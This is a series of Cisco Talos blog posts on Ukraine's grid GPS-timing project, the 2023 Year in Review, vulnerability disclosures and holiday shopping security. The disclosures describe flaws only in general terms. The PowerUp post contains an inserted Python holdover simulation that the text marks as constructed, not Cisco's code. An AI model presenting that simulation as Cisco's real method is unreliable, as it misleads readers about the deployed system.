Security researchers have found a way to bypass the Windows Hello login authentication system used with fingerprint readers and face ID scanners on devices from Dell, Lenovo and Microsoft. The researchers, hired by Microsoft to test the security of the readers, have since informed the company of these vulnerabilities. The attacks they outlined could provide access to a stolen laptop or enable an “evil maid” attack on an unattended device. Microsoft introduced Hello with its Windows 10 operating system and has since included fingerprint scanners on all its devices (though in some cases, Microsoft’s own hardware, such as the Surface tablet, did not use Hello). Although the manufacturers are now aware of these vulnerabilities, the variety of attacks means the issues can be difficult to patch. However, all of the attacks ultimately required physical access to a device. (Ars Technica, The Verge)

Can’t get enough Talos? 

Upcoming events where you can find Talos 

"Power of the Platform” by Cisco (Dec. 5 & 7) 

Virtual (Please note: This presentation will only be given in German) 

The annual IT event at the end of the year where Cisco experts, including Gergana Karadzhova-Dangela from Cisco Talos Incident Response, discuss the future-oriented topics in the implementation of digitalization together with you.  

What Threats Kept Us Up in 2023: A Year in Review and a Look Ahead (Dec. 13, 11 a.m. PT) 

Virtual 

Each year brings new threats that take advantage of increasingly complex security environments. Whether it’s Volt Typhoon targeting critical infrastructure organizations across the United States or ALPHV launching an attack against casino giant MGM, threat actors are becoming bolder and more evasive. That’s why it’s never been more important to leverage broad telemetry sources, deep network insights and threat intelligence to respond effectively and recover faster from sophisticated attacks. Join Amy Henderson, Director of Strategic Planning and Communications at Cisco Talos and Briana Farro, Director of XDR Product Management at Cisco, as they discuss some of the top threat trends and threats we have seen this past year and how to leverage security technology like XDR and network insights to fight against them. 

NIS2 Directive: Why Organizations Must Act Now to Ensure Compliance and Security (Jan. 11, 2024, 10 a.m. GMT) 

Virtual 

The NIS2 Directive is a crucial step toward securing Europe’s critical infrastructure and essential services in an increasingly interconnected world. Organizations must act now to prepare for the new requirements, safeguard their operations, and maintain a robust cybersecurity posture. Gergana Karadzhova-Dangela from Cisco Talos Incident Response and other Cisco experts will talk about how organizations can best prepare for the coming regulations.  

Most prevalent malware files from Talos telemetry over the past week 


Project PowerUp – Helping to keep the lights on in Ukraine in the face of electronic warfare

4 December 2023 at 13:01
  • As Russia’s invasion of Ukraine entered its first winter in late 2022, nearly half of Ukraine’s energy infrastructure had been destroyed, leaving millions without power. The resulting energy deficit has exacerbated something that hasn’t had much media attention: The effects of electronic GPS jammers affecting vital electrical equipment.
  • Ukraine’s high-voltage electricity substations rely on GPS for time synchronization. So, when the GPS is jammed, the stations can’t accurately report to power dispatchers on the state of the grid.
  • This complicates efforts to balance loads between different parts of the system, which is necessary to avoid outages and failure — especially during peak demand and surge times. Until recently, there was no solution to this problem.
  • Cisco Talos worked alongside several other teams at Cisco, along with government partners in the U.S. and Ukraine, to find a technological solution.

Since the start of the Russian invasion of Ukraine, Talos has been unwavering in our commitment to protect Ukrainian critical infrastructure from cyberattacks. 

In this blog post, you won’t find any mention of malware, DDoS, or espionage campaigns. In fact, it’s not about cybersecurity at all. This is a story about electronic warfare and GPS. It’s about how one chance conversation over dinner led me on a path through Cisco to find a solution to some very tough questions, and difficult answers.  

So, who am I? My name is Joe Marshall. I work at Cisco Talos as a cyber threat researcher and security strategist. My expertise is in industrial control systems and electric grids. My colleagues and friends at Talos are on the front lines of keeping the internet safe — and from more than just cyber threats, as you’ll read.

Project PowerUp is the story of how Cisco Talos worked with a multi-national, multi-company coalition of volunteers and experts to inject a measure of stability in Ukraine’s power transmission grid.

Our ultimate goal was to “keep the lights on” in Ukraine, and help make the lives of Ukrainians living in an active war zone just that little bit easier.

Chapter 1: The energy deficit

As Russia’s invasion of Ukraine entered its first winter in late 2022, Russia stepped up attacks on Ukraine’s energy sector to deprive citizens of electricity and heat during the coldest part of the year. Nearly half of Ukraine’s energy infrastructure had been destroyed, leaving millions without power. The resultant energy deficit was exacerbated by another wartime challenge that, for some reason, hasn’t had much media attention: the effects of deliberate GPS disruptions affecting vital electrical equipment.

For the past year, there have been numerous reports of Russia interfering with GPS signals, especially near and within its own borders. Use of electronic jamming devices has been linked to attempts to disrupt GPS guided munitions, protect troops, and advance the tactical and strategic goals of armed conflict. 

While electronic interference can affect the battlefield, it is also having a secondary, unintended effect on Ukraine’s energy sector. Many of Ukraine’s high-voltage electrical substations — which play a vital role in the country’s domestic transmission of power — make extensive use of the availability of precise GPS timing information to help operators anticipate, react and diagnose a complex high-voltage electric grid. This is a complicated task during normal times, much less during a war.

When GPS signals are widely disrupted, substations cannot synchronize their time reporting accurately because they cannot assign accurate timestamps. Without well-synchronized data, efforts to balance loads between different parts of the system are hampered, and that balancing is what avoids outages and failures, especially during peak demand and surge times. The disruption can be widespread, causing wide areas to lose GPS service for long periods of time. 

Until now, Ukraine has not had a viable solution to this issue for electric power systems.

Chapter 2: A chance meeting

I first learned about this situation when I was delivering a cybersecurity presentation in February of 2023. The audience just so happened to include a delegation from Ukrenergo, the electricity transmission system operator in Ukraine, which is solely responsible for operating the country’s high-voltage electrical lines. Talos has been working with Ukrenergo for many years. 

The night before the presentation, colleagues from Ukrenergo invited me to dinner. When we sat down, I couldn’t help but persist with a barrage of questions: “How are you? Are you safe? What’s going on?” 

They started to tell me the true extent of what had been happening. This was one year since the start of the invasion. It was still deeply cold in Ukraine, and Russia had continually bombarded critical infrastructure for the entire winter. By March, there would be word that Russia’s campaign was beginning to tail off, but we didn’t know that at the time.

Ukrenergo started to list problem after problem, specifically with regards to the power grids. There were the obvious problems we all knew of, of course – kinetic strikes against substations were knocking out the power. Energy transformers were being destroyed, and replacements were scarce. One problem mentioned was rather casual, sandwiched in between others: “We can’t get reliable timing due to electronic GPS jamming.” 

As I mentioned earlier, Ukraine’s high-voltage electricity substations rely on GPS for time synchronization. So, when the GPS is deliberately disrupted, the stations can’t accurately report to power dispatchers on the state of the grid. 

My ill-informed, rather bombastic response to this was, “Just buy some atomic clocks! You know…the type used by NASA.” Only after the words came out of my mouth did I remember that atomic clocks might not be a financially feasible option for this war-torn country. In fact, one member of the Ukrenergo delegation wryly retorted (I'm paraphrasing here), “Sure. Show me the aisle of the grocery store where atomic clocks can be found cheaply.” 

For the rest of the night, we talked about the GPS issues, the war, and Ukraine’s response to being attacked. Despite the sober undertones, the dinner company was superb, and the fellowship top-notch. The GPS timing issue, however, wouldn’t leave my head. I tried to look at it from all different angles. 

When we said goodbye that night, I silently vowed I was going to do everything in my power to help. But at the time, I had no answers. 

High-voltage substations are critical components in the power system where power can be pooled from generating resources, transformed to different voltage levels, and delivered to the load points. Substations are interconnected with each other, creating a network that increases the reliability of the power supply system by providing alternate paths for power flow. This ensures that power delivery is maintained at all times and there are no outages.

Substation in Ukraine damaged by Russian airstrikes

Chapter 3: The time paradox

While thinking about viable solutions, I was guided by an important principle: Whatever we do, speed is key. As I was wracking my brain, Ukraine was at war and suffering. However, I soon began to learn that it wasn’t as simple as that, due to the sheer complexities of what the country was up against. 

To truly understand the layers of solving this issue, I need to talk about why GPS clock timing is so important to electric grids. Most people are familiar with GPS because we rely on it for navigation, but it has also become the dominant system for the distribution of time and frequency signals globally. The U.S. controls and operates the GPS satellites, which orbit the earth twice a day and broadcast signals anyone in the world can use.

These satellites send very precise time data to GPS receivers on the ground that receive and decode the signals, effectively synchronizing each receiver to the same clock. This enables users to determine the time within 100 nanoseconds without the cost of owning and operating expensive and complex equipment, such as atomic clocks. 

Because GPS time is so accurate, GPS-disciplined clocks are commonly used in industrial systems, like Ukraine’s power grid, that require extremely precise time across a vast geographic area. 

Most devices that rely on time to calculate measurements have frequency references. The frequency reference is provided by an internal crystal oscillator within the device, and that crystal tells the device how fast time is going. However, these times are never perfectly accurate due to manufacturing variations and other variables in the crystal oscillators, causing time to advance at slightly different rates across various devices. This is why the clock on your laptop might be a few seconds or minutes ahead or behind the clock in your car. 

GPS solves this challenge. Devices can use the GPS satellites’ time signal to determine how accurate their local time reference is and then adjust the time accordingly, thereby enabling all devices running GPS-enabled clocks to be aligned to the exact same time. 


These GPS time signals are crucial for making a key piece of power equipment called a phasor measurement unit (PMU) run effectively. PMUs are used in power systems around the world to augment operators’ visibility into what is happening throughout a vast power grid network. A PMU measures a quantity called a phasor, which is the magnitude and phase angle of a voltage or current at a specific location on a power line.  

PMUs are essential to providing a detailed and accurate view of power quality across a wide geographic grid. Data from PMUs allows operators to predict and detect stress and stability on the grid, identify inefficiencies, and provide information for event analysis after a disturbance occurs. 

PMU data is time-stamped — to the precision of a microsecond — using the timing signal from GPS satellites. Therefore, measurements taken by PMUs in different locations are accurately synchronized with each other and time-aligned using the same global time reference marker. This allows all PMU data to be combined to provide precise and comprehensive information about an entire power grid. 

When GPS clocks are unavailable and the corresponding time signal has an error, that error can cause false calculations of phase angle and misalignment of grid conditions relative to other PMUs. Without the ability to analyze the precise timing of an electrical anomaly as it propagates through a grid, grid operators have difficulty diagnosing the exact issue that requires correction. Relatedly, if GPS timing is down, grid operators will have increased difficulty balancing power during the adverse events that occur during wartime.

Chapter 4: "You don't need atomic clocks"

After that fateful dinner with Ukrenergo, I spent the next few nights in deep thought. My brain wouldn’t let go of this timing issue. I consulted with colleagues and experts from other organizations who specialize in electric grid security, and ironically, they all suggested the same thing – atomic clocks. 

I knocked on Talos Vice President Matt Watchinski’s door. I explained the situation to him, and ended by saying, “So can Cisco make an atomic clock?” I’d got it into my head that the only possible solution was to create a version of an atomic clock, as their holdover is measured in nanoseconds of accuracy. More than enough accuracy for a power grid.

Matt responded by saying he had no idea, but he would make some phone calls. That led me to a meeting with our Cisco Internet of Things (IoT) division. I asked them the same question I asked Matt: “Can Cisco make an atomic clock to counteract the GPS jamming, like what is being reported in Ukraine?” 

After some research and identifying all manner of issues with locating an atomic clock, the team said, “Actually, we don’t think you need one. We think we have an existing solution within our IoT networking equipment. We can use that to build something unique for this specific situation.”

As is the case with most things in life, you should put your faith in the experts. And I’m so glad I listened to the IoT team. Because that was how we turned the ship, and Project PowerUp was a go.

Together with Cisco’s IoT networking team, we were going to design, create and deliver custom devices to Ukraine to keep substations running and delivering power to the entire country. 

“Throughout this war, I’ve seen and heard how resilient Ukrainians are. It’s very true. Citizens are dealing with one awful situation after the other, to the extent that this mentality of everyday trauma has become normalized. However, ‘getting used’ to power outages and not being able to keep warm in the winter shouldn’t be normal. That’s what this whole project is about.” – Eric Wenger, senior director of technology policy for Cisco Government Affairs

Chapter 5: Is it good enough?

I mentioned earlier that this initiative was guided by the principle that speed was key. Delays meant potentially disastrous consequences. But I soon came to add another principle: Perfection is the enemy of good enough. 

The IoT team’s suggestion was that a Cisco Industrial Ethernet switch would be the best starting point in identifying a potential solution to the issues caused by Ukraine’s GPS outages. Industrial Ethernet switches do not have atomic clocks for holdover accuracy – but they have a good enough clock, able to measure time accurately in microseconds, to sustain an accurate time sync. This is important – Ukraine's electric grids operate at a 50 Hz frequency and have timing needs in microseconds.  

An Industrial Ethernet switch is part of Cisco’s hardened suite of switches, routers and other products designed specifically for rugged deployment, and Ukraine’s warzone undoubtedly fits into that category. These devices are built to withstand harsh industrial environments and extreme temperature ranges (-40°C to 75°C). 

Hardened switches also have various internal resiliency features, including the source for their internal clock. Most network hardware devices use an internal crystal oscillator to generate their clock time, but these crystals’ frequencies can vary widely based on local conditions. An Industrial Ethernet switch avoids this problem, as its crystal is a superior and resilient design, providing better frequency stability for precise synchronization of features such as GPS reception. 


Despite an Industrial Ethernet switch’s advantages, we needed to make some software modifications that would enable the device to address the specific set of challenges facing Ukraine’s power grid. 


There were two core issues we had to address with the Industrial Ethernet switch that required us to make enhancements to the device. First, we had to ensure interoperability between an Industrial Ethernet switch and the PMUs, and second, an Industrial Ethernet switch needed to provide the necessary holdover during GPS outages for the PMUs to continue working. Holdover is the time period to keep the clocks in sync until timing signals can be restored. 

During Ukraine’s GPS outages, which can last several hours, the PMUs effectively declare that something is wrong and stop sending data to the broader power management infrastructure — which causes significant upstream effects. Our first goal was to find a way to keep the PMU transmitting data. By modifying the metadata that an Industrial Ethernet switch sends to the PMUs, the PMUs continue operating and sending data even without that signal. 

Next, we had to enable the Industrial Ethernet switch to provide an accurate time to the PMUs when time was unavailable (aka, the “holdover” period). We modified the Industrial Ethernet switch’s code to provide trusted time. 

With an Industrial Ethernet switch deployed to Ukraine’s substations, it measures the difference between the PMU’s local time reference and GPS time while GPS is still active. Then, when the GPS signal is lost, the PMU can revert to using the local time reference, which is now highly accurate thanks to the earlier error measurements, thereby allowing the PMU to continue operating.   

To ensure that an Industrial Ethernet switch fully understands what the GPS signal is telling it before the signal shuts down, Cisco created new, enhanced clock recovery algorithms. We also applied some additional filtering to the device’s software to allow it to recognize that the signal is down and to provide a “best guess” of what the time was when GPS was lost. 
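The discipline-then-holdover scheme just described, as a constructed simulation added here (this is not Cisco's code nor the switch's actual clock recovery algorithm): while GPS is up it fits the local crystal's offset and rate against GPS time, then extrapolates through a multi-hour outage and converts the remaining timestamp error into PMU phase-angle error at 50 Hz. The oscillator model, the receiver jitter level and the 20 ppm / 350 ms numbers are assumptions.

```python
import random
from dataclasses import dataclass

GRID_FREQ_HZ = 50.0  # Ukraine's grid runs at 50 Hz (from the article)


@dataclass
class CrystalOscillator:
    """Free-running local clock. Constructed model (an assumption): the
    crystal runs fast or slow by a fixed part-per-million error and starts
    with an arbitrary offset from true (GPS) time."""
    ppm_error: float
    offset_s: float

    def read(self, true_time_s: float) -> float:
        return true_time_s * (1.0 + self.ppm_error * 1e-6) + self.offset_s


def discipline(osc, gps_times, jitter_s=50e-9, seed=1):
    """Discipline phase: while GPS is up, record (gps_time, local_time) pairs
    and fit local = a + b * gps by centred least squares. b captures the
    crystal's rate error, a its offset. jitter_s models GPS receiver noise
    (constructed value)."""
    rng = random.Random(seed)
    samples = [(t, osc.read(t) + rng.gauss(0.0, jitter_s)) for t in gps_times]
    n = len(samples)
    gm = sum(g for g, _ in samples) / n
    lm = sum(l for _, l in samples) / n
    sxx = sum((g - gm) ** 2 for g, _ in samples)
    sxy = sum((g - gm) * (l - lm) for g, l in samples)
    b = sxy / sxx
    a = lm - b * gm
    return a, b


def holdover_time(osc, a, b, true_time_s):
    """Holdover phase: GPS is gone, so invert the fitted model to turn a raw
    local reading back into an estimate of GPS time."""
    return (osc.read(true_time_s) - a) / b


def phase_error_deg(time_error_s, freq_hz=GRID_FREQ_HZ):
    """A timestamp error maps directly onto a phasor angle error: one full
    cycle (360 degrees) per grid period, so 1 us at 50 Hz is 0.018 degrees."""
    return 360.0 * freq_hz * time_error_s


def simulate(ppm_error=20.0, offset_s=0.35, discipline_s=3600, holdover_s=4 * 3600):
    """One hour of GPS-disciplined operation followed by a four-hour outage.
    Returns (uncorrected_error_s, corrected_error_s) at the end of holdover:
    the error of the raw crystal versus the error after applying the fit."""
    osc = CrystalOscillator(ppm_error, offset_s)
    a, b = discipline(osc, range(discipline_s))
    t_end = discipline_s + holdover_s
    uncorrected = osc.read(t_end) - t_end
    corrected = holdover_time(osc, a, b, t_end) - t_end
    return uncorrected, corrected


if __name__ == "__main__":
    unc, cor = simulate()
    print(f"raw crystal after 4 h holdover: {unc * 1e3:.1f} ms off "
          f"({phase_error_deg(unc) % 360:.1f} deg phase error, unusable)")
    print(f"disciplined holdover: {cor * 1e6:.3f} us off "
          f"({phase_error_deg(cor):.6f} deg phase error)")
```

The raw crystal drifts by hundreds of milliseconds, which is many full cycles of phase error, while the learned rate keeps the holdover estimate within well under a microsecond, which is why a "good enough" stable oscillator suffices once its error has been measured against GPS.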

We now had a device that was ready for production, but the job wasn’t done until testing was completed. After successful testing, Cisco immediately prioritized production of these devices. Hardware and software engineers from across the company pooled their collective expertise and created a production line capable of supporting the unique needs of Ukraine.

Our switches in Ukraine! 

From the very start of Project PowerUp all I kept thinking about was the big picture of what we were trying to achieve. I’m proud to say that Cisco did this in an incredibly fast timeline. It is no easy feat to re-prioritize production efforts, especially in a technology company as vast as Cisco. But we had that guiding principle of speed and urgency – the longer this took for us to get these devices into Ukraine, the more days Ukrainians would be threatened with grid instability. 

A special shoutout to our Cisco Critical Accounts team. This team has been relentless in helping get key deliveries to Ukraine since the start of the invasion, and they were able to help drive the urgency for Project PowerUp too.

Chapter 6: Closing thoughts

As I write this, our Industrial Ethernet switches are in Ukraine, helping keep the lights on. This reminds me of what we do at Talos every day: we fight the good fight to protect others.  

It is a lamentable fact that in cybersecurity and in critical infrastructure protection, we’re often confronted with the fact that our work, while valuable, may never be realized in our lifetimes as professionals. It is the legacy we leave with others we help protect and is built upon a large community who believe in fighting that good fight for generations to come. 

Project PowerUp is a little different. We know, beyond a doubt, that our work there will help save lives and will help keep the lights on. The effects are incredibly difficult to calculate, but we know it’s going to make life better. It’s helping others stay out of harm’s way. It’s helping a hospital that may not have reliable backup power. It’s giving a child just five more minutes of their childhood watching cartoons. 

If anything can be taken away from this, it’s that acting and leading with empathy is core to our mission at Talos. This year we took a chance to make a tangible difference in the lives of others and help them have a better life. Fighting the good fight isn’t just about cybersecurity – it’s about doing the right thing and helping others in the face of adversity. 

What started as a chance presentation this year turned into a multi-national, multi-company global team of power grid security practitioners who had never worked together before. As a team, we overcame numerous challenges to make Project PowerUp work. We could not have been successful without the support of numerous experts in Cisco who helped innovate this novel solution. And, of course, we must thank our partners in Ukraine, the U.S. government, and ICS vendors and experts who lent us their time, empathy, and expertise. We are humble and grateful for their help.

Slava Ukraini! 

The malware, attacker trends and more that shaped the threat landscape in 2023

5 December 2023 at 23:25

The 2023 Cisco Talos Year in Review is now available to download. 

Once again, the Talos team has meticulously combed through a massive amount of data to analyze the major trends that have shaped the threat landscape in 2023. Global conflict influenced a lot of these trends, altering the tactics and approaches of many threat actors. In operations ranging from espionage to cybercrime, we’ve seen geopolitical events have a significant impact on the way these are carried out.


At the beginning of the Year in Review is a “Top Trends” section made up of regional trends over time and the influence of geopolitical events, the CVEs attackers exploited most often, spam tactics, and the top MITRE ATT&CK techniques that have been used within attacks. The report then takes a deep dive into four topics:  

  • The evolution of ransomware and extortion.
  • The concerning rate of attacks against network infrastructure devices.
  • The activities of advanced persistent threat (APT) actors in China, Russia, and the Middle East. This section also includes the major threats our Ukraine Task Unit dealt with this year.
  • The shifting activities and impact of commodity loaders. 

Cisco’s global presence and Talos’ world-class expertise provided a massive amount of data to research — endpoint detections, incident response engagements, network traffic, email corpus, sandboxes, honeypots and much more. Thankfully, our teammates include subject matter experts from all ends of the cybersecurity space to help us turn this intelligence into actionable information for defenders and users.  

So, what is the main story of the 2023 Year in Review? Despite the accelerated pace of many threat actor campaigns and the geopolitical events that shaped them, the defensive community’s diligence, inventiveness and collaborative efforts are helping to push adversaries back.  

Download the Cisco Talos Year in Review today, and please share it with your colleagues and communities. This report was written by defenders, for defenders, and we hope it proves a useful and insightful resource for you. 

For more Year in Review content, visit the 2023 Year in Review landing page.

Beers with Talos episode 141: The TurkeyLurkey Man wants YOU to read Talos' Year in Review report

6 December 2023 at 10:41

In this episode the Beers with Talos team, led by special guest Dave Liebenberg, set out to save Thanksgiving. The TurkeyLurkey Man is the hero that everybody needs, but perhaps doesn't deserve.

For fans and opposers of Dave's Ranksgiving list, you'll be pleased to know he's back with a whole new order, and some new snackable entrants.

Oh, and if it's security content you're after, we have some! Our 2023 Year in Review is out now, and the team recaps the top malware and attacker trends from the year. We also discussed the recent CNN article and Talos blog on our work to protect Ukraine's power grid.

If you'd like to read more, download the full Talos Year in Review report here.

Subscribe to future episodes of Beers with Talos at your own peril here.

Remote code execution vulnerabilities found in Buildroot, Foxit PDF Reader

6 December 2023 at 18:33

Cisco Talos has disclosed 10 vulnerabilities over the past two weeks, including nine that exist in a popular online PDF reader that offers a browser plugin. 

Attackers could exploit these vulnerabilities in the Foxit PDF Reader to carry out a variety of malicious actions, but most notably could gain the ability to execute arbitrary code on the targeted machine. Foxit aims to have feature parity with Adobe Acrobat Reader, the most popular PDF-reading software currently on the market. The company offers paid versions of its software for a variety of users, including individuals and enterprises. Foxit also offers browser plugins that run in a variety of web browsers, including Google Chrome and Mozilla Firefox. 

Talos’ Vulnerability Research team also found an integer overflow vulnerability in the GPSd daemon, which is triggered if an attacker sends a specially crafted packet, causing the daemon to crash. 

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

Multiple vulnerabilities in Foxit PDF Reader 

Discovered by Kamlapati Choubey. 

Foxit PDF Reader contains multiple vulnerabilities that could lead to remote code execution if exploited correctly.  

TALOS-2023-1837 (CVE-2023-32616) and TALOS-2023-1839 (CVE-2023-38573) can be exploited if an attacker embeds malicious JavaScript into a PDF, and the targeted user opens that PDF in Foxit. These vulnerabilities can trigger the use of a previously freed object, which can lead to memory corruption and arbitrary code execution.  

TALOS-2023-1838 (CVE-2023-41257) works in the same way, but in this case, it is caused by a type confusion vulnerability.  

Three other vulnerabilities could allow an attacker to create arbitrary HTA files in the context of the application, and eventually gain the ability to execute arbitrary code on the targeted machine. TALOS-2023-1832 (CVE-2023-39542), TALOS-2023-1833 (CVE-2023-40194) and TALOS-2023-1834 (CVE-2023-35985) are all triggered if the targeted user opens a specially crafted file in the Foxit software or browser plugin. 

GPSd NTRIP Stream Parsing access violation vulnerability 

Discovered by Dimitrios Tatsis. 

An integer overflow vulnerability exists in the NTRIP Stream Parsing functionality of GPS daemon, which is used to collect and display GPS information in other software. A specially crafted network packet can lead to memory corruption. An attacker can send a malicious packet to trigger TALOS-2023-1860 (CVE-2023-43628). 

According to GPSd’s website, this service daemon powers the map service on Android mobile devices and is “ubiquitous in drones, robot submarines, and driverless cars.” 

Buildroot - embedded Linux systems builder tool 

Discovered by Claudio Bozzato and Francesco Benvenuto. 

Talos researchers recently found multiple data integrity vulnerabilities in Buildroot, a tool that automates builds of Linux environments for embedded systems. 

An adversary could carry out a man-in-the-middle attack to exploit TALOS-2023-1845 (CVE-2023-43608) and TALOS-2023-1844 (CVE-2023-45842, CVE-2023-45839, CVE-2023-45838, CVE-2023-45840 and CVE-2023-45841) to execute arbitrary code in the builder. 

As a direct consequence, an attacker could then also tamper with any file generated for Buildroot’s targets and hosts. 

Malformed Excel file could lead to arbitrary code execution in WPS Office 

Discovered by Marcin “Icewall” Noga. 

An uninitialized pointer use vulnerability (TALOS-2023-1748/CVE-2023-31275) exists in the functionality of WPS Office, a suite of software for word and data processing, that handles Data elements in an Excel file.  

A specially crafted malformed Excel file can lead to remote code execution. 

WPS Office, previously known as Kingsoft Office, is a software suite for Microsoft Windows, macOS, Linux, iOS, Android, and HarmonyOS developed by Chinese software developer Kingsoft. It is installed by default on Amazon Fire tablet devices. 

Talos disclosed this vulnerability in November despite there being no official fix or patch from Kingsoft, after the company did not respond to our notification attempts and missed the 90-day deadline outlined in Cisco’s third-party vendor vulnerability disclosure policy.  

Cybersecurity considerations to have when shopping for holiday gifts

7 December 2023 at 19:00

As I wrote about last week, there are holiday shopping-related scams already popping up all over the place.  

But another aspect of security that many shoppers don’t consider this time of year is the security of the products they’re buying, even through a legitimate online marketplace. 

This is a glaring issue with home security cameras and Wi-Fi-connected doorbells, but I can’t imagine these are particularly popular holiday gifts. With virtually everything being connected to the internet somehow these days, everything is a potential security risk if you’re buying a new piece of technology. 

Take smartwatches, for example. Apple Watches and Samsung Galaxy watches are always popular on everyone’s wishlists this time of year because they’re high-priced items you normally wouldn’t buy for yourself. Many shoppers might be looking for a deal this time of year and not looking to spend hundreds on the gift, so any sort of cheaper alternative could be appealing. 

I searched for “smart watches” on Amazon, and the results page displayed four different watches from four different vendors as their “Top Results,” none of which were Samsung and Apple. Well-known vendors are certainly not immune to security issues or vulnerabilities, but at least users can be confident that any known vulnerabilities will be disclosed and patched by these companies as they pop up. 


The top result is for a $29.99 smartwatch that offers sleep tracking, blood pressure monitoring, dozens of different workout modes, step tracking, and more. However, there are a few security flags for me right up front with this deal (after all, if it seems too good to be true, it probably is). Amazon states the seller is a company called “Nerunsa,” but a quick search did not turn up any legitimate information on who this company is, where they’re based, or the sort of security bona fides you’d be hoping for. The only search results are for the company’s Amazon store page and a few eBay listings for people reselling the watch in question. 

The app that’s listed as supporting the watch is called “GloryFit” on the Google Play and Apple app stores, and its privacy policy is equally vague. It states that the app will collect all the information you’d expect for someone using a smartwatch — phone calls, text messages, GPS location, personal information, health information, etc. But the policy states that, when the user accepts the privacy policy, “You hereby consent to our process and disclose personal information to our affiliated companies (which are in the communications, social media, technology and cloud businesses) and to Third Party Service Providers for the purposes of this Privacy Policy.” And it’s not particularly clear what those other companies do, exactly — Google was no help here, either. 

Apple Air Tags are also another popular tech gift every year and are usually featured in major retailers’ Black Friday sales. I personally have my own concerns about any type of tracking tag coming into my house, but that’s for another column. 

On Walmart, which is increasingly trying to compete with Amazon by offering more products online, I searched for “smart tag” and found three results that appeared ahead of Apple’s legitimate Air Tags. The second-most-popular result is for a “Bluetooth Tracker and Item Locator” that’s only $15.98, compared to $86.88 for a four-pack of Apple’s. This tracker is listed as being made by “AILIUTOP,” which also remains elusive on the internet and does not seem to have any sort of legitimate contact information available to the public. Their store page on Walmart indicates the seller offers many types of products, from clothing to home goods and more.  

This seems like a good bargain as a gift for someone who is always losing their keys or wallet or wants to make sure their bicycle is secure when they lock it up somewhere. But purchasing these types of “smart” devices with so much uncertainty poses a few issues. 

If you do experience some sort of security failure or issue, there is no easy way to contact any of these vendors through the traditional means that the average user would go searching for. These vendors have no clear history of responsibly disclosing vulnerabilities, releasing security updates, or testing their products’ security before release. 

When these types of gifts are dealing with such high-profile information like your personal information, health data, or physical location, users should be confident that their information is being stored correctly and securely, or at least there’s a way to contact the vendor should they have any questions. 

When searching for holiday gifts online, make sure you’re buying from a trusted vendor, or if you haven’t heard of the vendor before, take a few extra minutes just to look them up, read their app’s privacy policy, or even read the reviews to make sure there’s no clear sign of bot activity like repetitive words or phrases or using the same photo for multiple reviews.  

The one big thing 

The 2023 Cisco Talos Year in Review is now available to download. Once again, the Talos team has meticulously combed through a massive amount of data to analyze the major trends that have shaped the threat landscape in 2023. Global conflict influenced a lot of these trends, altering the tactics and approaches of many threat actors. In operations ranging from espionage to cybercrime, we’ve seen geopolitical events have a significant impact on the way these are carried out. 

Why do I care? 

The Year in Review report includes new data and telemetry from Talos about attacker trends, popular malware seen in the wild, and much more. Despite the accelerated pace of many threat actor campaigns and the geopolitical events that shaped them, our report shows that the defensive community’s diligence, inventiveness and collaborative efforts are helping to push adversaries back.   

So now what? 

Download our full report here, bookmark the Year in Review landing page for future content we have planned around the report, and listen to the Beers with Talos episode that covers the details of the report. 

Top security headlines of the week 

More than six million people are reportedly victims of a large data breach at DNA and genealogy testing firm 23andMe. The breach is larger than initially expected, with more than 5.5 million users who opted into the company’s “DNA Relatives” feature, which allows customers to automatically share some of their data with other users. Another 1 million-plus users had their family tree information accessed. The attackers accessed the accounts because of password reuse by users, likely ones who used easy-to-guess login information or passwords they used across multiple other accounts. 23andMe was not the target of the initial breach, nor was a company account the source of the compromised credentials. Security experts are urging users to move away from traditional username-and-password login methods as these types of attacks happen more often, instead moving toward multi-factor authentication or passwordless logins. (TechCrunch, Wall Street Journal) 

Apple released emergency fixes for two zero-day vulnerabilities in its WebKit browser engine that have already been exploited in the wild. The company reported that the flaws are being exploited on devices running iOS versions before iOS 16.7.1 (released on Oct. 10, 2023). There are new patches available, which users should install immediately, in iOS, iPadOS, macOS Sonoma and the Safari web browser. The two vulnerabilities, tracked as CVE-2023-42916 and CVE-2023-42917, leave affected devices vulnerable to adversaries accessing sensitive information on targeted devices. CVE-2023-42917 could also allow an attacker to execute arbitrary code on the targeted machine. (SC Magazine, Decipher) 

Security researchers say a new threat actor known as “AeroBlade” compromised a U.S. aerospace company for more than a year. The actor reportedly started testing their malware and infection chain on the targeted network in September 2022 and executed malware on the network in July 2023. The activity sat undetected for months due to anti-analysis techniques. It is currently unknown what actions, if any, the actor carried out during that time or if they compromised any user or customer data. The initial infection began with a Microsoft Word lure document with the title “SOMETHING WENT WRONG Enable Content to load the document.” The ensuing malicious Microsoft Word template (DOTM) file then loaded a DLL that served as a reverse shell. Researchers say the attacker’s intent was likely to steal data from the target to sell it, potentially supply it to international competitors, or use it to extort the target into paying a ransom. (Dark Reading, Bleeping Computer)  

Can’t get enough Talos? 

Security journalists from Decipher bring you the headlines, including new U.S. government sanctions on threat actor groups in our latest Threat Spotlight video.

Then, Hazel chats to Talos security researcher Joe Marshall to discuss the Talos 2023 Year in Review, and Project PowerUp, the story of how Cisco Talos worked with a multi-national, multi-company coalition of volunteers and experts to help “keep the lights on” in Ukraine, by injecting a measure of stability in Ukraine’s power transmission grid.

Upcoming events where you can find Talos 

“Power of the Platform” by Cisco (Dec. 5 & 7) 

Virtual (Please note: This presentation will only be given in German) 

The annual IT event at the end of the year where Cisco experts, including Gergana Karadzhova-Dangela from Cisco Talos Incident Response, discuss the future-oriented topics in the implementation of digitalization together with you.  

What Threats Kept Us Up in 2023: A Year in Review and a Look Ahead (Dec. 13, 11 a.m. PT) 

Virtual 

Each year brings new threats that take advantage of increasingly complex security environments. Whether it’s Volt Typhoon targeting critical infrastructure organizations across the United States or ALPHV launching an attack against casino giant MGM, threat actors are becoming bolder and more evasive. That’s why it’s never been more important to leverage broad telemetry sources, deep network insights and threat intelligence to respond effectively and recover faster from sophisticated attacks. Join Amy Henderson, Director of Strategic Planning and Communications at Cisco Talos and Briana Farro, Director of XDR Product Management at Cisco, as they discuss some of the top threat trends and threats we have seen this past year and how to leverage security technology like XDR and network insights to fight against them. 

NIS2 Directive: Why Organizations Must Act Now to Ensure Compliance and Security (Jan. 11, 2024, 10 a.m. GMT) 

Virtual 

The NIS2 Directive is a crucial step toward securing Europe’s critical infrastructure and essential services in an increasingly interconnected world. Organizations must act now to prepare for the new requirements, safeguard their operations, and maintain a robust cybersecurity posture. Gergana Karadzhova-Dangela from Cisco Talos Incident Response and other Cisco experts will talk about how organizations can best prepare for the coming regulations.  

